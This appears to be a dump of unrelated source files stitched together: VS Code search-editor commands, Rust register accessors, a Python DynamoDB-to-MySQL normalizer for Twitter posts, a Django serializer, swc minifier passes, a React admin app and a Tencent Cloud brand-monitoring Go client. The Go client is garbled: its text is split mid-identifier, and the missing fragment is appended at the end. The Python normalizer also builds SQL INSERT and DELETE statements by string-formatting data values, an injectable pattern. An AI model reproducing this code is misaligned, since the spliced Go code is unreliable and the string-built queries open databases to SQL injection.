when: ContextKeyExpr.and(SearchEditorConstants.InSearchEditor, SearchConstants.SearchInputBoxFocusedKey),
handler: toggleSearchEditorRegexCommand
}, ToggleRegexKeybinding));
KeybindingsRegistry.registerCommandAndKeybindingRule({
id: ToggleSearchEditorContextLinesCommandId,
weight: KeybindingWeight.WorkbenchContrib,
when: ContextKeyExpr.and(SearchEditorConstants.InSearchEditor),
handler: toggleSearchEditorContextLinesCommand,
primary: KeyMod.Alt | KeyCode.KEY_L,
mac: { primary: KeyMod.CtrlCmd | KeyMod.Alt | KeyCode.KEY_L }
});
KeybindingsRegistry.registerCommandAndKeybindingRule({
id: IncreaseSearchEditorContextLinesCommandId,
weight: KeybindingWeight.WorkbenchContrib,
when: ContextKeyExpr.and(SearchEditorConstants.InSearchEditor),
handler: (accessor: ServicesAccessor) => modifySearchEditorContextLinesCommand(accessor, true),
primary: KeyMod.Alt | KeyCode.US_EQUAL
});
KeybindingsRegistry.registerCommandAndKeybindingRule({
id: DecreaseSearchEditorContextLinesCommandId,
weight: KeybindingWeight.WorkbenchContrib,
when: ContextKeyExpr.and(SearchEditorConstants.InSearchEditor),
handler: (accessor: ServicesAccessor) => modifySearchEditorContextLinesCommand(accessor, false),
primary: KeyMod.Alt | KeyCode.US_MINUS
});
KeybindingsRegistry.registerCommandAndKeybindingRule({
id: SelectAllSearchEditorMatchesCommandId,
weight: KeybindingWeight.WorkbenchContrib,
when: ContextKeyExpr.and(SearchEditorConstants.InSearchEditor),
primary: KeyMod.CtrlCmd | KeyMod.Shift | KeyCode.KEY_L,
handler: selectAllSearchEditorMatchesCommand
});
CommandsRegistry.registerCommand(
CleanSearchEditorStateCommandId,
(accessor: ServicesAccessor) => {
const activeEditorPane = accessor.get(IEditorService).activeEditorPane;
if (activeEditorPane instanceof SearchEditor) {
activeEditorPane.cleanState();
}
});
//#endregion
//#region Actions
const category = localize('search', "Search Editor");
export type OpenSearchEditorArgs = Partial<SearchConfiguration & { triggerSearch: boolean, focusResults: boolean }>;
const openArgDescription = {
description: 'Open a new search editor. Arguments passed can include variables like ${relativeFileDirname}.',
args: [{
name: 'Open new Search Editor args',
schema: {
properties: {
query: { type: 'string' },
includes: { type: 'string' },
excludes: { type: 'string' },
contextLines: { type: 'number' },
wholeWord: { type: 'boolean' },
caseSensitive: { type: 'boolean' },
regexp: { type: 'boolean' },
useIgnores: { type: 'boolean' },
showIncludesExcludes: { type: 'boolean' },
triggerSearch: { type: 'boolean' },
focusResults: { type: 'boolean' },
}
}
}]
} as const;
registerAction2(class extends Action2 {
constructor() {
super({
id: 'search.searchEditor.action.deleteFileResults',
title: localize('searchEditor.deleteResultBlock', "Delete File Results"),
keybinding: {
weight: KeybindingWeight.EditorContrib,
when: SearchEditorConstants.InSearchEditor,
primary: KeyMod.CtrlCmd | KeyMod.Shift | KeyCode.Backspace,
},
precondition: SearchEditorConstants.InSearchEditor,
category,
f1: true,
});
}
async run(accessor: ServicesAccessor) {
const contextService = accessor.get(IContextKeyService).getContext(document.activeElement);
if (contextService.getValue(SearchEditorConstants.InSearchEditor.serialize())) {
(accessor.get(IEditorService).activeEditorPane as SearchEditor).deleteResultBlock();
}
}
});
registerAction2(class extends Action2 {
constructor() {
super({
id: SearchEditorConstants.OpenNewEditorCommandId,
title: localize('search.openNewSearchEditor', "Open new Search Editor"),
category,
f1: true,
description: openArgDescription
});
}
async run(accessor: ServicesAccessor, args: OpenSearchEditorArgs) {
await accessor.get(IInstantiationService).invokeFunction(openNewSearchEditor, args);
}
});
registerAction2(class extends Action2 {
constructor() {
super({
id: OpenNewEditorToSideCommandId,
title: localize('search.openNewEditorToSide', "Open new Search Editor to the Side"),
category,
f1: true,
description: openArgDescription
});
}
async run(accessor: ServicesAccessor, args: OpenSearchEditorArgs) {
await accessor.get(IInstantiationService).invokeFunction(openNewSearchEditor, args, true);
}
});
registerAction2(class extends Action2 {
constructor() {
super({
id: OpenInEditorCommandId,
title: localize('search.openResultsInEditor', "Open Results in Editor"),
category,
f1: true,
keybinding: {
primary: KeyMod.Alt | KeyCode.Enter,
when: ContextKeyExpr.and(SearchConstants.HasSearchResults, SearchConstants.SearchViewFocusedKey),
weight: KeybindingWeight.WorkbenchContrib,
mac: {
primary: KeyMod.CtrlCmd | KeyCode.Enter
}
},
});
}
async run(accessor: ServicesAccessor) {
const viewsService = accessor.get(IViewsService);
const instantiationService = accessor.get(IInstantiationService);
const searchView = getSearchView(viewsService);
if (searchView) {
await instantiationService.invokeFunction(createEditorFromSearchResult, searchView.searchResult, searchView.searchIncludePattern.getValue(), searchView.searchExcludePattern.getValue());
}
}
});
registerAction2(class extends Action2 {
constructor() {
super({
id: RerunSearchEditorSearchCommandId,
title: localize('search.rerunSearchInEditor', "Search Again"),
category,
keybinding: {
primary: KeyMod.CtrlCmd | KeyMod.Shift | KeyCode.KEY_R,
when: SearchEditorConstants.InSearchEditor,
weight: KeybindingWeight.EditorContrib
},
icon: searchRefreshIcon,
menu: [{
id: MenuId.EditorTitle,
group: 'navigation',
when: ActiveEditorContext.isEqualTo(SearchEditorConstants.SearchEditorID)
},
{
id: MenuId.CommandPalette,
when: ActiveEditorContext.isEqualTo(SearchEditorConstants.SearchEditorID)
}]
});
}
async run(accessor: ServicesAccessor) {
const editorService = accessor.get(IEditorService);
const input = editorService.activeEditor;
if (input instanceof SearchEditorInput) {
(editorService.activeEditorPane as SearchEditor).triggerSearch({ resetCursor: false });
}
}
});
registerAction2(class extends Action2 {
constructor() {
super({
id: FocusQueryEditorWidgetCommandId,
title: localize('search.action.focusQueryEditorWidget', "Focus Search Editor Input"),
category,
menu: {
id: MenuId.CommandPalette,
when: ActiveEditorContext.isEqualTo(SearchEditorConstants.SearchEditorID)
},
keybinding: {
primary: KeyCode.Escape,
when: SearchEditorConstants.InSearchEditor,
weight: KeybindingWeight.EditorContrib
}
});
}
async run(accessor: ServicesAccessor) {
const editorService = accessor.get(IEditorService);
const input = editorService.activeEditor;
if (input instanceof SearchEditorInput) {
(editorService.activeEditorPane as SearchEditor).focusSearchInput();
}
}
});
//#endregion
stim24.rs
#[doc = r" Value read from the register"]
pub struct R {
bits: u32,
}
#[doc = r" Value to write to the register"]
pub struct W {
bits: u32,
}
impl super::STIM24 {
#[doc = r" Modifies the contents of the register"]
#[inline]
pub fn modify<F>(&self, f: F)
where
for<'w> F: FnOnce(&R, &'w mut W) -> &'w mut W,
{
let bits = self.register.get();
let r = R { bits: bits };
let mut w = W { bits: bits };
f(&r, &mut w);
self.register.set(w.bits);
}
#[doc = r" Reads the contents of the register"]
#[inline]
pub fn read(&self) -> R {
R {
bits: self.register.get(),
}
}
#[doc = r" Writes to the register"]
#[inline]
pub fn write<F>(&self, f: F)
where
F: FnOnce(&mut W) -> &mut W,
{
let mut w = W::reset_value();
f(&mut w);
self.register.set(w.bits);
}
#[doc = r" Writes the reset value to the register"]
#[inline]
pub fn reset(&self) {
self.write(|w| w)
}
}
#[doc = r" Value of the field"]
pub struct STIM24R {
bits: u32,
}
impl STIM24R {
#[doc = r" Value of the field as raw bits"]
#[inline]
pub fn bits(&self) -> u32 {
self.bits
}
}
#[doc = r" Proxy"]
pub struct _STIM24W<'a> {
w: &'a mut W,
}
impl<'a> _STIM24W<'a> {
#[doc = r" Writes raw bits to the field"]
#[inline]
pub unsafe fn bits(self, value: u32) -> &'a mut W {
const MASK: u32 = 4294967295;
const OFFSET: u8 = 0;
self.w.bits &= !((MASK as u32) << OFFSET);
self.w.bits |= ((value & MASK) as u32) << OFFSET;
self.w
}
}
impl R {
#[doc = r" Value of the register as raw bits"]
#[inline]
pub fn bits(&self) -> u32 {
self.bits
}
#[doc = "Bits 0:31 - 31:0\\] A write to this location causes data to be written into the FIFO if TER.STIMENA24 is set. Reading from the stimulus port returns the FIFO status in bit \\[0\\]: 0 = full, 1 = not full. The polled FIFO interface does not provide an atomic read-modify-write, so it's users responsibility to ensure exclusive read-modify-write if this ITM port is used concurrently by interrupts or other threads."]
#[inline]
pub fn stim24(&self) -> STIM24R {
let bits = {
const MASK: u32 = 4294967295;
const OFFSET: u8 = 0;
((self.bits >> OFFSET) & MASK as u32) as u32
};
STIM24R { bits }
}
}
impl W {
#[doc = r" Reset value of the register"]
#[inline]
pub fn reset_value() -> W {
W { bits: 0 }
}
#[doc = r" Writes raw bits to the register"]
#[inline]
pub unsafe fn bits(&mut self, bits: u32) -> &mut Self {
self.bits = bits;
self
}
#[doc = "Bits 0:31 - 31:0\\] A write to this location causes data to be written into the FIFO if TER.STIMENA24 is set. Reading from the stimulus port returns the FIFO status in bit \\[0\\]: 0 = full, 1 = not full. The polled FIFO interface does not provide an atomic read-modify-write, so it's users responsibility to ensure exclusive read-modify-write if this ITM port is used concurrently by interrupts or other threads."]
#[inline]
pub fn stim24(&mut self) -> _STIM24W {
_STIM24W { w: self }
}
}
normalizer_mysql.py
#!/usr/bin/python3
import json,datetime,time,argparse,logging,sys,os
sys.path.append(os.path.join(os.path.dirname(__file__), "libs"))
from boto3.dynamodb.conditions import Attr
import general_storage,sqs,utils,query,general_storage_mysql
from progress.bar import Bar
from pprint import pprint
class Normalizer():
## Normalizer class holds the data and configuration for normalizing source/target pairs
## source(input) of normalization
source={}
## target(output) of normalization
target={}
## mapping from target key to source key or lambda function
target_source_rule={}
def set_source(self,source):
self.source=source
def set_target(self,target):
self.target=target
def get_source_value(self,s):
## get value from source with key s or lambda function s
mapping=self.target_source_rule[s]
if isinstance(mapping,str):
## if mapping is a string key
return self.source.get(mapping)
else:
## if mapping is lambda function
return mapping(self)
def get_info(self,item):
## get info field
author = self.get_author(item)
return utils.fix_data_to_string({
"created_time" : item["created_time"],
"message":item['message'],
"from" : author
})
def get_author(self,item):
## get author field
return utils.fix_data_to_string({"id":item["user_id"],
"name":item.get("user_name","unknown"),
"profile_picture_url":item['original_data'].get("user",{}).get("profile_image_url_https","")})
def normalize_source_to_target(self,cf,source):
## Normalizing from source obect to target object
self.set_source(source)
if self.source:
for s in self.target_source_rule:
self.target[s] = self.get_source_value(s)
else:
print("No source specified")
class Normalizer_post_dynomodb_mysql(Normalizer):
## Normalizer class for post from dynamodb to mysql
name="posts"
## source(input) of normalization
source={}
## target(output) of normalization
target={}
target_source_rule={'page_id':'asset_id',
'sub_page_id':'asset_id',
'post_id':'object_id',
'updated_time':'updated_time',
'created_time':'created_time',
'info':lambda x: x.get_info(x.source),
'json_search':'',
'author':lambda x:x.get_author(x.source),
'tags':'',
'task_ids':''
}
class Normalizer_comment_dynomodb_mysql(Normalizer):
## Normalizer class for comment from dynamodb to mysql
name="comments"
## source(input) of normalization
source={}
## target(output) of normalization
target={}
target_source_rule={'page_id':'asset_id',
'sub_page_id':'asset_id',
'message':'message',
'post_id':'post_id',
'comment_id':'object_id',
#'parent_id':'post_id',
#'updated_time':'updated_time',
'created_time':'created_time',
'info':lambda x: x.get_info(x.source),
'json_search':'',
'author':lambda x:x.get_author(x.source),
'tags':'',
'task_ids':''
}
def insert_dynamodb_item_into_mysql(cf,i):
## Normalize an item from its DynamoDB form to its MySQL form, then insert it into the MySQL database
if i['object_type']=='post':
nl = Normalizer_post_dynomodb_mysql()
else:
nl = Normalizer_comment_dynomodb_mysql()
nl.normalize_source_to_target(cf,i)
connection = general_storage_mysql.create_connection(cf)
attributes,values = general_storage_mysql.simple_json_to_mysql_query(nl.target)
query="insert into twit_%s_%s(%s) values(%s)" %(nl.name,cf.client_short_name,attributes,values)
print(query)
general_storage_mysql.execute_query(connection,query)
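# Illustrative note: for a post the generated statement has the shape
# "insert into twit_posts_<client_short_name>(page_id,post_id,...) values(...)",
# with the column and value lists produced by simple_json_to_mysql_query().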
def delete_mysql_item(cf,i):
## Delete the corresponding item from the MySQL database
if i['object_type']=='post':
query="delete from twit_posts_%s where post_id=%s" %(cf.client_short_name,i['object_id'])
else:
query="delete from twit_comments_%s where comment_id=%s" %(cf.client_short_name,i['object_id'])
connection = general_storage_mysql.create_connection(cf)
general_storage_mysql.execute_query(connection,query)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Normalizer for twitter between DynamoDB and mysql')
parser.add_argument('config', type=str, help='an config file for normalizer')
parser.add_argument('--query', type=str, default=None, help='query to get data for normalizer')
parser.add_argument('--type', type=str, default="own", help='general or own. general:get everything using query; own:get own post and all replies')
args = parser.parse_args()
config = __import__(args.config)
cf =config.Config()
if args.type=="own":
query_str = args.query
if query_str:
query_str = query_str + " AND user_id:%s AND object_type:post" %(cf.twitter_user_id)
else:
query_str="user_id:%s AND object_type:post" %(cf.twitter_user_id)
total,posts = query.query_items(cf,query_str)
if total>0:
for post_id in [x["id"] for x in posts]:
post_with_comments=general_storage.get_item_and_comments(cf,post_id)
#print("%s comments" %(len(post_with_comments["comments"])))
insert_dynamodb_item_into_mysql(cf,post_with_comments["item"])
for comment in post_with_comments["comments"]:
insert_dynamodb_item_into_mysql(cf,comment)
elif args.type=="general":
#utils.run_until_finish(lambda: utils.process_sqs_rerun(cf,queue_name,process_clara,cf.clara_batch_size))
db_items=general_storage.get_items_by_ids(cf,query.es_outputs_to_ids(items))
for i in db_items:
insert_dynamodb_item_into_mysql(cf,i)
serializers.py
from rest_framework import serializers
from .models import Movies
class MoviesSerializer(serializers.ModelSerializer):
class Meta:
model = Movies
fields = [
'id' , 'user_main', 'title', 'director', 'acts', 'created_at'
]
sequences.rs
use super::Pure;
use crate::mode::Mode;
use swc_common::{util::take::Take, SyntaxContext, DUMMY_SP};
use swc_ecma_ast::*;
use swc_ecma_utils::{ExprExt, ExprFactory};
impl<M> Pure<'_, M>
where
M: Mode,
{
pub(super) fn drop_useless_ident_ref_in_seq(&mut self, seq: &mut SeqExpr) {
if !self.options.collapse_vars {
return;
}
if seq.exprs.len() < 2 {
return;
}
match (
&*seq.exprs[seq.exprs.len() - 2],
&*seq.exprs[seq.exprs.len() - 1],
) {
(Expr::Assign(assign @ AssignExpr { op: op!("="), .. }), Expr::Ident(ident)) => {
// Check if lhs is same as `ident`.
match &assign.left {
PatOrExpr::Expr(_) => {}
PatOrExpr::Pat(left) => match &**left {
Pat::Ident(left) => {
if left.id.sym == ident.sym && left.id.span.ctxt == ident.span.ctxt {
tracing::debug!(
"drop_useless_ident_ref_in_seq: Dropping `{}` as it's useless",
left.id
);
self.changed = true;
seq.exprs.pop();
}
}
_ => {}
},
}
}
_ => {}
}
}
///
/// - `(a, b, c) && d` => `a, b, c && d`
pub(super) fn lift_seqs_of_bin(&mut self, e: &mut Expr) {
let bin = match e {
Expr::Bin(b) => b,
_ => return,
};
match &mut *bin.left {
Expr::Seq(left) => {
if left.exprs.is_empty() {
return;
}
self.changed = true;
tracing::debug!("sequences: Lifting sequence in a binary expression");
let left_last = left.exprs.pop().unwrap();
let mut exprs = left.exprs.take();
exprs.push(Box::new(Expr::Bin(BinExpr {
span: left.span,
op: bin.op,
left: left_last,
right: bin.right.take(),
})));
*e = Expr::Seq(SeqExpr {
span: bin.span,
exprs,
})
}
_ => {}
}
}
///
/// - `x = (foo(), bar(), baz()) ? 10 : 20` => `foo(), bar(), x = baz() ? 10 : 20;`
pub(super) fn lift_seqs_of_cond_assign(&mut self, e: &mut Expr) {
if !self.options.sequences() {
return;
}
let assign = match e {
Expr::Assign(v @ AssignExpr { op: op!("="), .. }) => v,
_ => return,
};
let cond = match &mut *assign.right {
Expr::Cond(v) => v,
_ => return,
};
match &mut *cond.test {
Expr::Seq(test) => {
//
if test.exprs.len() >= 2 {
let mut new_seq = vec![];
new_seq.extend(test.exprs.drain(..test.exprs.len() - 1));
self.changed = true;
tracing::debug!("sequences: Lifting sequences in a assignment with cond expr");
let new_cond = CondExpr {
span: cond.span,
test: test.exprs.pop().unwrap(),
cons: cond.cons.take(),
alt: cond.alt.take(),
};
new_seq.push(Box::new(Expr::Assign(AssignExpr {
span: assign.span,
op: assign.op,
left: assign.left.take(),
right: Box::new(Expr::Cond(new_cond)),
})));
*e = Expr::Seq(SeqExpr {
span: assign.span,
exprs: new_seq,
});
return;
}
}
_ => {}
}
}
/// `(a = foo, a.apply())` => `(a = foo).apply()`
///
/// This is useful for outputs of swc/babel
pub(super) fn merge_seq_call(&mut self, e: &mut SeqExpr) {
if !self.options.sequences() {
return;
}
for idx in 0..e.exprs.len() {
let (e1, e2) = e.exprs.split_at_mut(idx);
let a = match e1.last_mut() {
Some(v) => &mut **v,
None => continue,
};
let b = match e2.first_mut() {
Some(v) => &mut **v,
None => continue,
};
match (&mut *a, &mut *b) {
(
Expr::Assign(a_assign @ AssignExpr { op: op!("="), .. }),
Expr::Call(CallExpr {
callee: ExprOrSuper::Expr(b_callee),
args,
..
}),
) => {
let var_name = a_assign.left.as_ident();
let var_name = match var_name {
Some(v) => v,
None => continue,
};
match &mut **b_callee {
Expr::Member(MemberExpr {
obj: ExprOrSuper::Expr(b_callee_obj),
computed: false,
prop,
..
}) => {
//
if !b_callee_obj.is_ident_ref_to(var_name.sym.clone()) {
continue;
}
match &**prop {
Expr::Ident(Ident { sym, .. }) => match &**sym {
"apply" | "call" => {}
_ => continue,
},
_ => {}
}
let span = a_assign.span.with_ctxt(SyntaxContext::empty());
let obj = a.take();
let new = Expr::Call(CallExpr {
span,
callee: MemberExpr {
span: DUMMY_SP,
obj: obj.as_obj(),
prop: prop.take(),
computed: false,
}
.as_callee(),
args: args.take(),
type_args: Default::default(),
});
b.take();
self.changed = true;
tracing::debug!(
"sequences: Reducing `(a = foo, a.call())` to `((a = foo).call())`"
);
*a = new;
}
_ => {}
};
}
_ => {}
}
}
}
}
GiiApplication.js
import React from 'react';
import PropTypes from 'prop-types';
import {connect} from 'react-redux';
import {Router, Link, Nav} from 'yii-steroids/ui/nav';
import {Notifications} from 'yii-steroids/ui/layout';
import {push} from 'react-router-redux';
import _orderBy from 'lodash/orderBy';
import _values from 'lodash/values';
import {html, http, widget} from 'components';
import IndexPage from './routes/IndexPage';
import AccessPage from './routes/AccessPage/index';
import ClassCreatorPage from './routes/ClassCreatorPage/index';
import ClassTypeMeta from '../../enums/meta/ClassTypeMeta';
import './GiiApplication.scss';
const bem = html.bem('GiiApplication');
export default
@widget.register('\\steroids\\modules\\gii\\widgets\\GiiApplication\\GiiApplication')
@connect()
class GiiApplication extends React.PureComponent {
static propTypes = {
roles: PropTypes.arrayOf(PropTypes.string),
siteName: PropTypes.string,
};
constructor() {
super(...arguments);
this._onEntityComplete = this._onEntityComplete.bind(this);
this.state = {
isLoading: false,
classes: null,
appTypes: null,
moduleIds: null,
sampleAttributes: [],
};
}
componentDidMount() {
this.fetchData();
}
render() {
return (
<div className={bem.block({loading: this.state.isLoading})}>
<nav className='navbar navbar-expand-md navbar-dark bg-dark mb-3'>
<div className='container'>
<div>
<Link
className='navbar-brand'
to='/'
>
Gii
</Link>
<Link
className='navbar-brand'
url={this.props.siteName}
>
На главную
</Link>
</div>
<Nav
layout='navbar'
items={[
{
label: 'Сущности',
to: '/',
},
{
label: 'Права доступа',
to: '/access/actions',
},
{
label: 'Карта сайта',
to: '/site-map',
},
]}
/>
</div>
</nav>
<div className={bem(bem.element('content'), 'container')}>
<Notifications/>
<Router
routes={[
{
exact: true,
path: '/',
component: IndexPage,
componentProps: {
moduleIds: this.state.moduleIds,
classes: this.state.classes,
},
},
{
path: '/access',
component: AccessPage,
},
{
path: '/:classType(' + ClassTypeMeta.getKeys().join('|') + ')/:moduleId?/:name?',
component: ClassCreatorPage,
componentProps: {
moduleIds: this.state.moduleIds,
classes: this.state.classes,
appTypes: this.state.appTypes,
sampleAttributes: this.state.sampleAttributes,
onEntityComplete: this._onEntityComplete,
},
},
]}
/>
</div>
</div>
);
}
_onEntityComplete() {
this.props.dispatch(push('/'));
this.fetchData();
}
_getSampleAttributes(classes) {
const sampleAttributes = {};
const defaultSamples = {
id: ['primaryKey', 'ID'],
title: ['string', 'Название'],
email: ['email', 'Email'],
phone: ['phone', 'Телефон'],
password: ['password', 'Пароль'],
photo: ['file', 'Фотография'],
photos: ['files', 'Фотографии'],
image: ['file', 'Изображение'],
images: ['files', 'Изображения'],
file: ['file', 'Файл'],
files: ['files', 'Файлы'],
passwordAgain: ['password', 'Повтор пароля'],
description: ['text', 'Описание'],
content: ['text', 'Контент'],
userId: ['integer', 'Пользователь'],
authorId: ['integer', 'Автор'],
isEnable: ['boolean', 'Включен?'],
isDeleted: ['boolean', 'Удален?'],
status: ['enum', 'Статус'],
createTime: ['autoTime', 'Добавлен'],
updateTime: ['autoTime', 'Обновлен', {touchOnUpdate: true}],
};
Object.keys(defaultSamples).forEach(id => {
sampleAttributes[id] = {
counter: 1,
params: {
appType: defaultSamples[id][0],
label: defaultSamples[id][1],
...defaultSamples[id][2],
}
};
});
[classes.model, classes.form].map(models => {
models.forEach(model => {
model.attributeItems.map(item => {
if (sampleAttributes[item.name]) {
sampleAttributes[item.name].counter++;
} else {
sampleAttributes[item.name] = {
counter: 1,
params: {
appType: item.appType,
defaultValue: item.defaultValue,
example: item.example,
hint: item.hint,
label: item.label,
},
};
}
});
});
});
Object.keys(sampleAttributes).forEach(id => {
sampleAttributes[id].id = id;
sampleAttributes[id].label = id;
});
return _orderBy(_values(sampleAttributes), 'counter', 'desc');
}
fetchData() {
this.setState({isLoading: true});
http.post('/api/gii/get-entities')
.then(data => this.setState({
...data,
sampleAttributes: this._getSampleAttributes(data.classes),
isLoading: false,
}));
}
}
client.go
// Copyright 1999-2018 Tencent Ltd.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package v20180129
import (
"github.com/tencentcloud/tencentcloud-sdk-go/tencentcloud/common"
tchttp "github.com/tencentcloud/tencentcloud-sdk-go/tencentcloud/common/http"
"github.com/tencentcloud/tencentcloud-sdk-go/tencentcloud/common/profile"
)
const APIVersion = "2018-01-29"
type Client struct {
common.Client
}
func NewClientWithSecretId(secretId, secretKey, region string) (client *Client, err error) {
client = &Client{}
client.Init(region).WithSecretId(secretId, secretKey)
return
}
func NewClient(credential *common.Credential, region string, clientProfile *profile.ClientProfile) (client *Client, err error) {
client = &Client{}
client.Init(region).
WithSecretId(credential.SecretId, credential.SecretKey).
WithProfile(clientProfile)
return
}
func NewDescribeBrandCommentCountRequest() (request *DescribeBrandCommentCountRequest) {
request = &DescribeBrandCommentCountRequest{
BaseRequest: &tchttp.BaseRequest{},
}
request.Init().WithApiInfo("tbm", APIVersion, "DescribeBrandCommentCount")
return
}
func NewDescribeBrandCommentCountResponse() (response *DescribeBrandCommentCountResponse) {
response = &DescribeBrandCommentCountResponse{
BaseResponse: &tchttp.BaseResponse{},
}
return
}
// Analyzes the positive and negative sentiment of the words users use when commenting on the brand, and returns the daily counts of positive and negative brand comments.
func (c *Client) DescribeBrandCommentCount(request *DescribeBrandCommentCountRequest) (response *DescribeBrandCommentCountResponse, err error) {
if request == nil {
request = NewDescribeBrandCommentCountRequest()
}
response = NewDescribeBrandCommentCountResponse()
err = c.Send(request, response)
return
}
func NewDescribeBrandExposureRequest() (request *DescribeBrandExposureRequest) {
request = &DescribeBrandExposureRequest{
BaseRequest: &tchttp.BaseRequest{},
}
request.Init().WithApiInfo("tbm", APIVersion, "DescribeBrandExposure")
return
}
func NewDescribeBrandExposureResponse() (response *DescribeBrandExposureResponse) {
response = &DescribeBrandExposureResponse{
BaseResponse: &tchttp.BaseResponse{},
}
return
}
// Monitors the number of articles whose title or full text contains the brand keywords, with data output by day.
func (c *Client) DescribeBrandExposure(request *DescribeBrandExposureRequest) (response *DescribeBrandExposureResponse, err error) {
if request == nil {
request = NewDescribeBrandExposureRequest()
}
response = NewDescribeBrandExposureResponse()
err = c.Send(request, response)
return
}
func NewDescribeBrandMediaReportRequest() (request *DescribeBrandMediaReportRequest) {
request = &DescribeBrandMediaReportRequest{
BaseRequest: &tchttp.BaseRequest{},
}
request.Init().WithApiInfo("tbm", APIVersion, "DescribeBrandMediaReport")
return
}
func NewDescribeBrandMediaReportResponse() (response *DescribeBrandMediaReportResponse) {
response = &DescribeBrandMediaReportResponse{
BaseResponse: &tchttp.BaseResponse{},
}
return
}
// Monitors the number of reports in which the brand keywords appear in the title or body of articles published on media sites (news media, web portals, government sites, WeChat official accounts, Tiantian Kuaibao, etc.). Results are output by day.
func (c *Client) DescribeBrandMediaReport(request *DescribeBrandMediaReportRequest) (response *DescribeBrandMediaReportResponse, err error) {
if request == nil {
request = NewDescribeBrandMediaReportRequest()
}
response = NewDescribeBrandMediaReportResponse()
err = c.Send(request, response)
return
}
func NewDescribeBrandNegCommentsRequest() (request *DescribeBrandNegCommentsRequest) {
request = &DescribeBrandNegCommentsRequest{
BaseRequest: &tchttp.BaseRequest{},
}
request.Init().WithApiInfo("tbm", APIVersion, "DescribeBrandNegComments")
return
}
func NewDescribeBrandNegCommentsResponse() (response *DescribeBrandNegCommentsResponse) {
response = &DescribeBrandNegCommentsResponse{
BaseResponse: &tchttp.BaseResponse{},
}
return
}
// Analyzes the sentiment of the words users use when commenting on the brand, and returns the list of trending negative-comment opinions.
func (c *Client) DescribeBrandNegComments(request *DescribeBrandNegCommentsRequest) (response *DescribeBrandNegCommentsResponse, err error) {
if request == nil {
request = NewDescribeBrandNegCommentsRequest()
}
response = NewDescribeBrandNegCommentsResponse()
err = c.Send(request, response)
return
}
func NewDescribeBrandPosCommentsRequest() (request *DescribeBrandPosCommentsRequest) {
request = &DescribeBrandPosCommentsRequest{
BaseRequest: &tchttp.BaseRequest{},
}
request.Init().WithApiInfo("tbm", APIVersion, "DescribeBrandPosComments")
return
}
func NewDescribeBrandPosCommentsResponse() (response *DescribeBrandPosCommentsResponse) {
response = &DescribeBrandPosCommentsResponse{
BaseResponse: &tchttp.BaseResponse{},
}
return
}
// Analyzes the sentiment of the words users use when commenting on the brand, and returns the list of trending positive-comment opinions.
func (c *Client) DescribeBrandPosComments(request *DescribeBrandPosCommentsRequest) (response *DescribeBrandPosCommentsResponse, err error) {
if request == nil {
request = NewDescribeBrandPosCommentsRequest()
}
response = NewDescribeBrandPosCommentsResponse()
err = c.Send(request, response)
return
}
func NewDescribeBrandSocialOpinionRequest() (request *DescribeBrandSocialOpinionRequest) {
request = &DescribeBrandSocialOpinionRequest{
BaseRequest: &tchttp.BaseRequest{},
}
request.Init().WithApiInfo("tbm", APIVersion, "DescribeBrandSocialOpinion")
return
}
func NewDescribeBrandSocialOpinionResponse() (response *DescribeBrandSocialOpinionResponse) {
response = &DescribeBrandSocialOpinionResponse{
BaseResponse: &tchttp.BaseResponse{},
}
return
}
// Detects content where the brand keywords appear in publicly contributed personal posts (Weibo, QQ Interest Tribes, forums, blogs, etc.) and aggregates, every day, the list of hottest opinions over the last 30 days.
func (c *Client) DescribeBrandSocialOpinion(request *DescribeBrandSocialOpinionRequest) (response *DescribeBrandSocialOpinionResponse, err error) {
if request == nil {
request = NewDescribeBrandSocialOpinionRequest()
}
response = NewDescribeBrandSocialOpinionResponse()
err = c.Send(request, response)
return
}
func NewDescribeBrandSocialReportRequest() (request *DescribeBrandSocialReportRequest) {
request = &DescribeBrandSocialReportRequest{
BaseRequest: &tchttp.BaseRequest{},
}
request.Init().WithApiInfo("tbm", APIVersion, "DescribeBrandSocialReport")
return
}
func NewDescribeBrandSocialReportResponse() (response *DescribeBrandSocia | onse{
BaseResponse: &tchttp.BaseResponse{},
}
return
}
// Monitors the number of publicly contributed personal posts (Weibo, QQ Interest Tribes, forums, blogs, etc.) that contain the brand keywords. Data is output by day.
func (c *Client) DescribeBrandSocialReport(request *DescribeBrandSocialReportRequest) (response *DescribeBrandSocialReportResponse, err error) {
if request == nil {
request = NewDescribeBrandSocialReportRequest()
}
response = NewDescribeBrandSocialReportResponse()
err = c.Send(request, response)
return
}
func NewDescribeIndustryNewsRequest() (request *DescribeIndustryNewsRequest) {
request = &DescribeIndustryNewsRequest{
BaseRequest: &tchttp.BaseRequest{},
}
request.Init().WithApiInfo("tbm", APIVersion, "DescribeIndustryNews")
return
}
func NewDescribeIndustryNewsResponse() (response *DescribeIndustryNewsResponse) {
response = &DescribeIndustryNewsResponse{
BaseResponse: &tchttp.BaseResponse{},
}
return
}
// Based on the customer's customized industry keywords, monitors the number of reports in which the keywords appear in the title or body of articles published on media sites (news media, web portals, government sites, WeChat official accounts, Tiantian Kuaibao, etc.), along with the article list, source channel, author, publish time, and so on.
func (c *Client) DescribeIndustryNews(request *DescribeIndustryNewsRequest) (response *DescribeIndustryNewsResponse, err error) {
if request == nil {
request = NewDescribeIndustryNewsRequest()
}
response = NewDescribeIndustryNewsResponse()
err = c.Send(request, response)
return
}
func NewDescribeUserPortraitRequest() (request *DescribeUserPortraitRequest) {
request = &DescribeUserPortraitRequest{
BaseRequest: &tchttp.BaseRequest{},
}
request.Init().WithApiInfo("tbm", APIVersion, "DescribeUserPortrait")
return
}
func NewDescribeUserPortraitResponse() (response *DescribeUserPortraitResponse) {
response = &DescribeUserPortraitResponse{
BaseResponse: &tchttp.BaseResponse{},
}
return
}
// Analyzes and profiles users who have interacted with the brand in the media (for example, users who have publicly commented on brand news or posted opinions about the brand on public social channels) and returns the distribution of their profile attributes, such as gender, age, region, favorite celebrities, and favorite films and TV shows.
func (c *Client) DescribeUserPortrait(request *DescribeUserPortraitRequest) (response *DescribeUserPortraitResponse, err error) {
if request == nil {
request = NewDescribeUserPortraitRequest()
}
response = NewDescribeUserPortraitResponse()
err = c.Send(request, response)
return
}
| lReportResponse) {
response = &DescribeBrandSocialReportResp |
